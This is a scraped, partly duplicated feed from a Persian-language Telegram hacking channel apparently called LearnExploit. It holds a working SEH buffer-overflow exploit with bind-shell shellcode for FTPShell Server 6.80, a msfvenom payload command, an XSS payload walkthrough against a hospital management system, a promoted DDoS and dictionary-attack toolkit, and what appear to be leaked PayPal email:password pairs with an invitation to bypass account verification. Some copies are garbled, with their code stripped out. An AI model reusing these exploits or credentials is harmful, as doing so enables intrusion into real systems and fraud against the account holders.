#Pentesting - #Part 3 - #hackertest_Net
—————————————————-
سلام دوستان
با قسمت سوم (level 3) از اموزش hackertest با شما هستیم .
# به دلیل اینکه بیشتر موارد رو توضیح دادم دیگه توضیح نمیدم
خب یه نیگا به کد زیر بندازیم :
{
{
}
{
}
}
مواردی که از کد بالا میفهمیم :
1) در خط پنجم یک مقدار تعریف میکنه تا این مقدار توسط کاربر وارد شه
2) در خط ششم این مقدار رو برابر
قرار میده
مقدار بالا میگه که از کل صفحه مقدار alinkcolor رو برامون انتخاب کن
مقدار alinkcolor در تگ body :
میباشد .
یعنی کل موارد بالا == اگر ورودی کاربر مساوی
هدایت کن
# = > شاید بپرسید 97,98,114,97,101 این اعداد اگر دیکد بشن چی میشه ؟
در جواب باید بگم
مقداری است که بعد از دیکد حاصل میشه...
3) در اخر هم بخش :
{
این است که اگر مقدار ورودی کاربر برابر
—————————————————-
دوستان علت اینکه فیلم رکورد نمیکنم این هست که تا چند level موارد شبیه هم هستن و نیازی به رکورد نمیبینم و توضیح میدم.
امیدوارم که کسل کننده نباشه...
—————————————————-
T.me/LearnExploit
0Day.Today Boy's
—————————————————-
سلام دوستان
با قسمت سوم (level 3) از اموزش hackertest با شما هستیم .
# به دلیل اینکه بیشتر موارد رو توضیح دادم دیگه توضیح نمیدم
خب یه نیگا به کد زیر بندازیم :
<body onload=javascript:pass(); alink="#000000">
<SCRIPT LANGUAGE="JavaScript">
function pass()
{
var pw, Eingabe;
pw = window.document.alinkColor;
Eingabe = prompt ("Please enter password");
if (Eingabe == pw)
{
window.location.href=String.fromCharCode(97,98,114,97,101)+".htm";
}
else
{
alert("Try again");
}
}
</SCRIPT>
مواردی که از کد بالا میفهمیم :
1) در خط پنجم یک مقدار تعریف میکنه تا این مقدار توسط کاربر وارد شه
2) در خط ششم این مقدار رو برابر
window.document.alinkColor;
قرار میده
مقدار بالا میگه که از کل صفحه مقدار alinkcolor رو برامون انتخاب کن
مقدار alinkcolor در تگ body :
#00000
میباشد .
یعنی کل موارد بالا == اگر ورودی کاربر مساوی
#00000
بود مارو به String.fromCharCode(97,98,114,97,101)+".htm";
هدایت کن
# = > شاید بپرسید 97,98,114,97,101 این اعداد اگر دیکد بشن چی میشه ؟
در جواب باید بگم
abrae
مقداری است که بعد از دیکد حاصل میشه...
3) در اخر هم بخش :
else
{
alert("Try again");
این است که اگر مقدار ورودی کاربر برابر
#00000
نبود این عمل رو دوباره انجام بده.—————————————————-
دوستان علت اینکه فیلم رکورد نمیکنم این هست که تا چند level موارد شبیه هم هستن و نیازی به رکورد نمیبینم و توضیح میدم.
امیدوارم که کسل کننده نباشه...
—————————————————-
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Forwarded from اتچ بات
#BufferOverFlow (#BOF) #Bug
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
Telegram
اتچ بات
#BufferOverFlow (#BOF) #Bug ——————— سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید. ———————- Dl Link : yon.ir/bakJW ———————- Recorded By Ashkan Mogadas ———————- T.me/LearnExploit 0Day.Today Boy's
در پی این پست ...
post link : https://t.me/LearnExploit/381
خواستم مثال زنده براتون بزنم :
=============================================
#BufferOverFlow (#BOF) #Bug
اخرین اکسپلویتی که در این مورد ثبت شده مربوط به
لینک دانلود این نرم افزار :
http://www.ftpshell.com/downloadserver.htm
————
اکسپلویت :
نحوه ی ساختن شل کد خودتون :
#msfvenom -p windows/shell_bind_tcp LHOST=270.0.0.1 LPORT=8080 -b '\x00\x0A\x0D' -f c -o /root/Desktop/
———————
# اگر برای دوستان نامفهوم هست لطفا به فیلم اموزشی توجه کنند.
———————
ولی من یه توضیحی هم میدم دربارش :
با این پیلود رو مشخص میکنه
لیست charcode هارو براتون میگه
نوع فرمت فایل خروجی رو براتون میگه
لیست کامل فرمت ها :
مسیر فایل خروجی
LHOST & LPORT
هم که پورت و ایپی هست که متاسپلویت روی اون شنود میکنه (در این قسمت باید LHOST & LPORT خودتون رو وارد کنید.)
———————————————
T.me/LearnExploit
0Day.Today Boy's
post link : https://t.me/LearnExploit/381
خواستم مثال زنده براتون بزنم :
=============================================
#BufferOverFlow (#BOF) #Bug
اخرین اکسپلویتی که در این مورد ثبت شده مربوط به
FTPShell Server V 6.80
در قسمت Add Account Name
میباشد.لینک دانلود این نرم افزار :
http://www.ftpshell.com/downloadserver.htm
————
اکسپلویت :
#!/usr/bin/env python
shellcode = (
"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")
nSEH = "\xEB\x06\x90\x90"
SEH = "\x47\x05\xFC\x7F" #7FFC0547 POP EDI
buffer = "\x41" * 1268 + nSEH + SEH + shellcode
f = open ("FTPShell_Server_6.80.txt", "w")
f.write(buffer)
f.close()
————————————————نحوه ی ساختن شل کد خودتون :
#msfvenom -p windows/shell_bind_tcp LHOST=270.0.0.1 LPORT=8080 -b '\x00\x0A\x0D' -f c -o /root/Desktop/
———————
# اگر برای دوستان نامفهوم هست لطفا به فیلم اموزشی توجه کنند.
———————
ولی من یه توضیحی هم میدم دربارش :
-p
:با این پیلود رو مشخص میکنه
-b
:لیست charcode هارو براتون میگه
-f
:نوع فرمت فایل خروجی رو براتون میگه
لیست کامل فرمت ها :
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
vbapplication, vbscript
-o
: مسیر فایل خروجی
LHOST & LPORT
هم که پورت و ایپی هست که متاسپلویت روی اون شنود میکنه (در این قسمت باید LHOST & LPORT خودتون رو وارد کنید.)
———————————————
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
#BufferOverFlow (#BOF) #Bug
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
Forwarded from Deleted Account
python_6.rar
24.4 MB
Forwarded from Deleted Account
python_7.rar
37.8 MB
Forwarded from Deleted Account
python_8.rar
14.8 MB
Forwarded from Deleted Account
python_9.rar
11 MB
Forwarded from Deleted Account
python_10.rar
7.3 MB
✔️ #ابزاری جهت انجام کار های زیر:
-> حملات دیکشنری
-> حملات داس و دیداس
-> اسکن پورت با nmap
-> نصب ابزار های هکینگ
Git: github.com/Ha3MrX/Hacking.git
@LearnExploit
-> حملات دیکشنری
-> حملات داس و دیداس
-> اسکن پورت با nmap
-> نصب ابزار های هکینگ
Git: github.com/Ha3MrX/Hacking.git
@LearnExploit
This media is not supported in your browser
VIEW IN TELEGRAM
#Paypal
bandit21853@gmail.com:babydoll bbrittion@yahoo.com:sammysam benkemph206@gmail.com:squirel81
bert@coollink.net:kcdgdndx
@LearnExploit
هرکی تونست وریفای رد کنه
بیاد پیوی شات بده
@R4DiKaLL
bandit21853@gmail.com:babydoll bbrittion@yahoo.com:sammysam benkemph206@gmail.com:squirel81
bert@coollink.net:kcdgdndx
@LearnExploit
هرکی تونست وریفای رد کنه
بیاد پیوی شات بده
@R4DiKaLL
Forwarded from اتچ بات
#XSS in #Bayanno #Hostpital #Management #System v.40
باگ xss در سیستم مدیریت بیمارستان ها
============
نحوه ی انجام این اکسپلویت :
1-اول وارد بخش لوگین شده و از طریق ادمین لاگین بشید.
Loc : bayanno/index.php?login
———
2-بعد یه patient ایجاد کرده ~ (
در این قسمت در بخش
Name
کد جاوای خودتون رو وارد کنید.
و سپس بقیه ی قسمت هارو پر کنید.
برای مثال :
ᐸscript>alert(LearnExploit);ᐸ/script>
Loc :
bayanno/index.php?admin/dashboard
———
3-وارد داشبرد شده و دوباره به بخش patient بروید...
شما باگ Xss رو مشاهده میکنید...
)~
————————————-
از سایت زیر برای تست میتونید استفاده کنید :
http://creativeitem.com/demo/bayanno/index.php?home
===================
T.me/LearnExploit
باگ xss در سیستم مدیریت بیمارستان ها
============
نحوه ی انجام این اکسپلویت :
1-اول وارد بخش لوگین شده و از طریق ادمین لاگین بشید.
Loc : bayanno/index.php?login
———
2-بعد یه patient ایجاد کرده ~ (
در این قسمت در بخش
Name
کد جاوای خودتون رو وارد کنید.
و سپس بقیه ی قسمت هارو پر کنید.
برای مثال :
ᐸscript>alert(LearnExploit);ᐸ/script>
Loc :
bayanno/index.php?admin/dashboard
———
3-وارد داشبرد شده و دوباره به بخش patient بروید...
شما باگ Xss رو مشاهده میکنید...
)~
————————————-
از سایت زیر برای تست میتونید استفاده کنید :
http://creativeitem.com/demo/bayanno/index.php?home
===================
T.me/LearnExploit
Telegram
Forwarded from Deleted Account
python_11.rar
33.9 MB